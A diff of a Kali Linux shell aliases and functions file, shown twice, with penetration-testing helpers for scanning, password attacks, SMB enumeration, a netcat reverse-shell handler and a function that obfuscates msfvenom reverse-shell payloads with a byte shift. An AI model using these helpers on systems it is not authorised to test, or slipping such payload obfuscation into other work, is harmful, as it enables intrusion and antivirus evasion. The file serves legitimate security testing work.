daniruiz · November 3, 2024 15:38
diff --git a/kali-shell-aliases-and-functions.sh b/kali-shell-aliases-and-functions.sh
 ##################################################
 # Packages
 #   $ sudo apt install -y xclip grc gobuster rlwrap evil-winrm powercat seclists peass raven
 # Install flatpak
 #   -> https://www.kali.org/docs/tools/flatpak/
 # urlencode:
 #   $ sudo apt install gridsite-clients
 # Python2 pip
 #   $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py | python2"
 # Cool Hollywood screensaver ❤️
 #   $ sudo apt install kali-screensaver

 # Sudo without password
 # $ sudo dpkg-reconfigure kali-grant-root

 # Resources
 # accesschk.exe
 # https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

 reset=$'\E[0;0m'
 bold=$'\E[1m'
 red=$'\E[31m'
 green=$'\E[32m'
 blue=$'\E[34m'

 alias sudo='sudo ' # Causes the next word to be checked for alias substitution
 alias xclip='xclip -selection c'
 alias update='sudo sh -c "
  set -e
  export DEBIAN_FRONTEND=noninteractive
  dpkg --configure -a
  apt update
  apt -y --fix-broken --fix-missing full-upgrade
  apt -y autoremove --purge
 # Change nmap permissions and file capabilities in case it got overwritten
  chgrp adm /usr/bin/nmap
  chmod 750 /usr/bin/nmap
  setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip /usr/bin/nmap
 "
 echo
 echo Flatpak:
 flatpak update && flatpak remove --unused
 '

 alias rdesktop='rdesktop -k es'
 alias ssh='ssh -o "StrictHostKeyChecking no"'
 alias sshpass='_sshpass(){ sshpass "$@" -o "StrictHostKeyChecking no" }; _sshpass'

 alias gobusterdir='gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -k -u "$@"'
 alias john='john -w=/usr/share/wordlists/rockyou.txt'
 alias nikto='nikto -host'
 alias nmap='sudo grc nmap'
 alias wapiti='wapiti --color --url'
 alias wfuzz='wfuzz -c'
 alias whatweb='whatweb -a 3'
 alias wpscan='wpscan --rua -e ap,at,tt,cb,dbe,u,m --passwords /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt --url'

 alias webserver='python -m http.server 80'
 alias smbserver='impacket-smbserver share . -smb2support'

 alias proxy_nmap='sudo proxychains -q grc nmap -v -n -Pn -sT'
 alias proxy_hydra='sudo proxychains -q hydra'
 alias proxy_gobusterdir='HTTP_PROXY=socks5://127.0.0.1:9090/ gobusterdir'

 wordlists() {
  echo "${green}${bold}"
  figlet Wordlists
  echo ${reset}
  echo "${bold}Web server enumeration:${reset}"
  du -h /usr/share/seclists/Discovery/Web-Content/combined_words.txt \
          /usr/share/seclists/Discovery/Web-Content/combined_directories.txt \
  | sed 's/^/ /'
  echo " [i] Useful file extensions: php,asp,aspx,cgi,jsp,ini,config,cfg,xml,htm,html,json,bak,txt,zip"
  echo ""
  echo "${bold}Online credentials:${reset}"
  echo " > /usr/share/seclists/Passwords/probable-v2-top1575.txt"
  echo " > /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt"
  echo ""
  echo "${bold}Password Hash cracking:${reset}"
  echo " > /usr/share/wordlists/rockyou.txt"
  echo "________________________________________________________________________________________"
  command wordlists
 }

 # Running nmap as an unprivileged user
 # https://secwiki.org/w/Running_nmap_as_an_unprivileged_user
 # $ sudo chgrp adm /usr/bin/nmap
 # $ sudo chmod 750 /usr/bin/nmap
 # $ sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip /usr/bin/nmap
 export NMAP_PRIVILEGED=""
 nmapfast() {
  nmap_output=$(mktemp)
  command nmap -n -sS -Pn -T4 --min-rate 1000 -p- -v $1 -oN $nmap_output \
    | sed -u 's|[0-9]\+/tcp|\x1b\[1;32m\0\x1b\[0m|'
  ports=$(cat $nmap_output \
    | grep ^[1-9] \
    | cut -d/ -f1 \
    | xargs \
    | sed 's/ /,/g')
  echo ""
  echo "======================================="
  echo ""
  echo "    PORTS" 
  echo "    -----"
  echo "    ${bold}${red}${ports}${reset}"
  echo ""
  grc nmap -n -Pn -sT -p$ports -sC -sV $1
  echo ""
  echo "======================================="
  echo ""
  command nmap -n -Pn -sU --top-ports 100 -v $1 | sed -u 's|[0-9]\+/udp|\x1b\[1;34m\0\x1b\[0m|'
 }

 ## smbtest runs all the possible tests to check if a target machine is running
 ## an SMB server
 ## Usage:
 # $ smbtest <target>
 smbtest() {
  target=$1
  smbmap_output="$(smbmap -H $target -u %)"
  if ! echo "$smbmap_output" | grep -qF '[!]'; then
    echo "$smbmap_output" \
    | sed 's/WRITE/\x1b\[1;31m\0\x1b[0m/; s/READ/\x1b\[1;32m\0\x1b[0m/;'
  else
    smbclient -L //$target/ -U % --no-pass \
      || smbclient -L //$target/ -U anonymous --no-pass
  fi
  echo
  sudo msfdb init \
    && msfconsole -q -x "\
    use auxiliary/scanner/smb/smb_version; \
    set rhost ${target}; \
    run; \
    vulns ${target}; \
    exit"
 }

 ## rshell is a netcat wrapper for linux/unix reverse shell connections that
 ## handles all the necesary bits to have an interactive shell.
 ## Usage:
 # $ rshell <netcat_parameters...>
 # $ rshell -lp 443
 rshell() {
  read rows cols < <(stty size)
  stty raw -echo
  cat <(cat << EOF
 export TERM=xterm-256color
 export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

 for PYTHON in \$(which python python2 python3); do : ; done
 if [ -x "\$PYTHON" ]; then
  [ -x /bin/bash ] && exec \$PYTHON -c 'import pty;pty.spawn(("/bin/bash", "--rcfile", "/etc/skel/.bashrc", "-p"))'
  exec \$PYTHON -c 'import pty;pty.spawn(("/bin/sh"))'
 elif command -v script > /dev/null; then
  exec script -qc /bin/bash /dev/null
 fi
 stty rows $rows cols $cols

 # User commands to execute right after connection
 clear; \
 { \
 . /etc/os-release; \
 printf "\\===========(\033[1;31m\$(whoami)@\$(hostname)\033[00m)===========/\n"; \
 printf "|     \033[1;34mOS\033[00m :: \$PRETTY_NAME -- v\$VERSION_ID\n"; \
 printf "| \033[1;34mKernel\033[00m :: \$(uname -r -s -m)\n"; \
 printf "| \033[1;34mGroups\033[00m :: \$(groups)\n"; \
 printf "\____________________________________________________________\n"; \ 
 printf "\n"
 ip --color=auto address || ifconfig; \
 } 2>/dev/null ; \
 echo;
 EOF
  ) - | nc $@
  stty sane
 }


 ## Usage:
 # $ caesar_cipher_msfvenom <key> <msfvenom_parameters . . .>
 # $ caesar_cipher_msfvenom 4 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=443
 caesar_cipher_msfvenom() {
  KEY=$1
  shift
  payload="$(msfvenom "$@" -f csharp -v buf)"

  echo
  echo

  csharp << EOF
 using System.Text;

 ${payload}

 for (int i = 0; i < buf.Length; i++)
  buf[i] = (byte)(((uint)buf[i] + ${KEY}) & 0xFF);

 StringBuilder hex = new StringBuilder(buf.Length * 2);
 foreach (byte b in buf)
  hex.AppendFormat("0x{0:x2}, ", b);

 Console.WriteLine("byte[] buf = new byte[] { " + hex.ToString().Substring(0, hex.Length - 2) + " };");
 EOF
 }
	##################################################
	# Packages
	# $ sudo apt install -y xclip grc gobuster rlwrap evil-winrm powercat seclists peass raven
	# Install flatpak
	# -> https://www.kali.org/docs/tools/flatpak/
	# urlencode:
	# $ sudo apt install gridsite-clients
	# Python2 pip
	# $ sudo sh -c "curl https://bootstrap.pypa.io./pip/2.7/get-pip.py \| python2"
	# Cool Hollywood screensaver ❤️
	# $ sudo apt install kali-screensaver

	# Sudo without password
	# $ sudo dpkg-reconfigure kali-grant-root

	# Resources
	# accesschk.exe
	# https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

	reset=$'\E[0;0m'
	bold=$'\E[1m'
	red=$'\E[31m'
	green=$'\E[32m'
	blue=$'\E[34m'

	alias sudo='sudo ' # Causes the next word to be checked for alias substitution
	alias xclip='xclip -selection c'
	alias update='sudo sh -c "
	set -e
	export DEBIAN_FRONTEND=noninteractive
	dpkg --configure -a
	apt update
	apt -y --fix-broken --fix-missing full-upgrade
	apt -y autoremove --purge
	# Change nmap permissions and file capabilities in case it got overwritten
	chgrp adm /usr/bin/nmap
	chmod 750 /usr/bin/nmap
	setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip /usr/bin/nmap
	"
	echo
	echo Flatpak:
	flatpak update && flatpak remove --unused
	'

	alias rdesktop='rdesktop -k es'
	alias ssh='ssh -o "StrictHostKeyChecking no"'
	alias sshpass='_sshpass(){ sshpass "$@" -o "StrictHostKeyChecking no" }; _sshpass'

	alias gobusterdir='gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_words.txt -k -u "$@"'
	alias john='john -w=/usr/share/wordlists/rockyou.txt'
	alias nikto='nikto -host'
	alias nmap='sudo grc nmap'
	alias wapiti='wapiti --color --url'
	alias wfuzz='wfuzz -c'
	alias whatweb='whatweb -a 3'
	alias wpscan='wpscan --rua -e ap,at,tt,cb,dbe,u,m --passwords /usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt --url'

	alias webserver='python -m http.server 80'
	alias smbserver='impacket-smbserver share . -smb2support'

	alias proxy_nmap='sudo proxychains -q grc nmap -v -n -Pn -sT'
	alias proxy_hydra='sudo proxychains -q hydra'
	alias proxy_gobusterdir='HTTP_PROXY=socks5://127.0.0.1:9090/ gobusterdir'

	wordlists() {
	echo "${green}${bold}"
	figlet Wordlists
	echo ${reset}
	echo "${bold}Web server enumeration:${reset}"
	du -h /usr/share/seclists/Discovery/Web-Content/combined_words.txt \
	/usr/share/seclists/Discovery/Web-Content/combined_directories.txt \
	\| sed 's/^/ /'
	echo " [i] Useful file extensions: php,asp,aspx,cgi,jsp,ini,config,cfg,xml,htm,html,json,bak,txt,zip"
	echo ""
	echo "${bold}Online credentials:${reset}"
	echo " > /usr/share/seclists/Passwords/probable-v2-top1575.txt"
	echo " > /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt"
	echo ""
	echo "${bold}Password Hash cracking:${reset}"
	echo " > /usr/share/wordlists/rockyou.txt"
	echo "________________________________________________________________________________________"
	command wordlists
	}

	# Running nmap as an unprivileged user
	# https://secwiki.org/w/Running_nmap_as_an_unprivileged_user
	# $ sudo chgrp adm /usr/bin/nmap
	# $ sudo chmod 750 /usr/bin/nmap
	# $ sudo setcap cap_net_raw,cap_net_admin,cap_net_bind_service+eip /usr/bin/nmap
	export NMAP_PRIVILEGED=""
	nmapfast() {
	nmap_output=$(mktemp)
	command nmap -n -sS -Pn -T4 --min-rate 1000 -p- -v $1 -oN $nmap_output \
	\| sed -u 's\|[0-9]\+/tcp\|\x1b\[1;32m\0\x1b\[0m\|'
	ports=$(cat $nmap_output \
	\| grep ^[1-9] \
	\| cut -d/ -f1 \
	\| xargs \
	\| sed 's/ /,/g')
	echo ""
	echo "======================================="
	echo ""
	echo " PORTS"
	echo " -----"
	echo " ${bold}${red}${ports}${reset}"
	echo ""
	grc nmap -n -Pn -sT -p$ports -sC -sV $1
	echo ""
	echo "======================================="
	echo ""
	command nmap -n -Pn -sU --top-ports 100 -v $1 \| sed -u 's\|[0-9]\+/udp\|\x1b\[1;34m\0\x1b\[0m\|'
	}

	## smbtest runs all the possible tests to check if a target machine is running
	## an SMB server
	## Usage:
	# $ smbtest <target>
	smbtest() {
	target=$1
	smbmap_output="$(smbmap -H $target -u %)"
	if ! echo "$smbmap_output" \| grep -qF '[!]'; then
	echo "$smbmap_output" \
	\| sed 's/WRITE/\x1b\[1;31m\0\x1b[0m/; s/READ/\x1b\[1;32m\0\x1b[0m/;'
	else
	smbclient -L //$target/ -U % --no-pass \
	\|\| smbclient -L //$target/ -U anonymous --no-pass
	fi
	echo
	sudo msfdb init \
	&& msfconsole -q -x "\
	use auxiliary/scanner/smb/smb_version; \
	set rhost ${target}; \
	run; \
	vulns ${target}; \
	exit"
	}

	## rshell is a netcat wrapper for linux/unix reverse shell connections that
	## handles all the necesary bits to have an interactive shell.
	## Usage:
	# $ rshell <netcat_parameters...>
	# $ rshell -lp 443
	rshell() {
	read rows cols < <(stty size)
	stty raw -echo
	cat <(cat << EOF
	export TERM=xterm-256color
	export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

	for PYTHON in \$(which python python2 python3); do : ; done
	if [ -x "\$PYTHON" ]; then
	[ -x /bin/bash ] && exec \$PYTHON -c 'import pty;pty.spawn(("/bin/bash", "--rcfile", "/etc/skel/.bashrc", "-p"))'
	exec \$PYTHON -c 'import pty;pty.spawn(("/bin/sh"))'
	elif command -v script > /dev/null; then
	exec script -qc /bin/bash /dev/null
	fi
	stty rows $rows cols $cols

	# User commands to execute right after connection
	clear; \
	{ \
	. /etc/os-release; \
	printf "\\===========(\033[1;31m\$(whoami)@\$(hostname)\033[00m)===========/\n"; \
	printf "\| \033[1;34mOS\033[00m :: \$PRETTY_NAME -- v\$VERSION_ID\n"; \
	printf "\| \033[1;34mKernel\033[00m :: \$(uname -r -s -m)\n"; \
	printf "\| \033[1;34mGroups\033[00m :: \$(groups)\n"; \
	printf "\____________________________________________________________\n"; \
	printf "\n"
	ip --color=auto address \|\| ifconfig; \
	} 2>/dev/null ; \
	echo;
	EOF
	) - \| nc $@
	stty sane
	}


	## Usage:
	# $ caesar_cipher_msfvenom <key> <msfvenom_parameters . . .>
	# $ caesar_cipher_msfvenom 4 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.164 LPORT=443
	caesar_cipher_msfvenom() {
	KEY=$1
	shift
	payload="$(msfvenom "$@" -f csharp -v buf)"

	echo
	echo

	csharp << EOF
	using System.Text;

	${payload}

	for (int i = 0; i < buf.Length; i++)
	buf[i] = (byte)(((uint)buf[i] + ${KEY}) & 0xFF);

	StringBuilder hex = new StringBuilder(buf.Length * 2);
	foreach (byte b in buf)
	hex.AppendFormat("0x{0:x2}, ", b);

	Console.WriteLine("byte[] buf = new byte[] { " + hex.ToString().Substring(0, hex.Length - 2) + " };");
	EOF
	}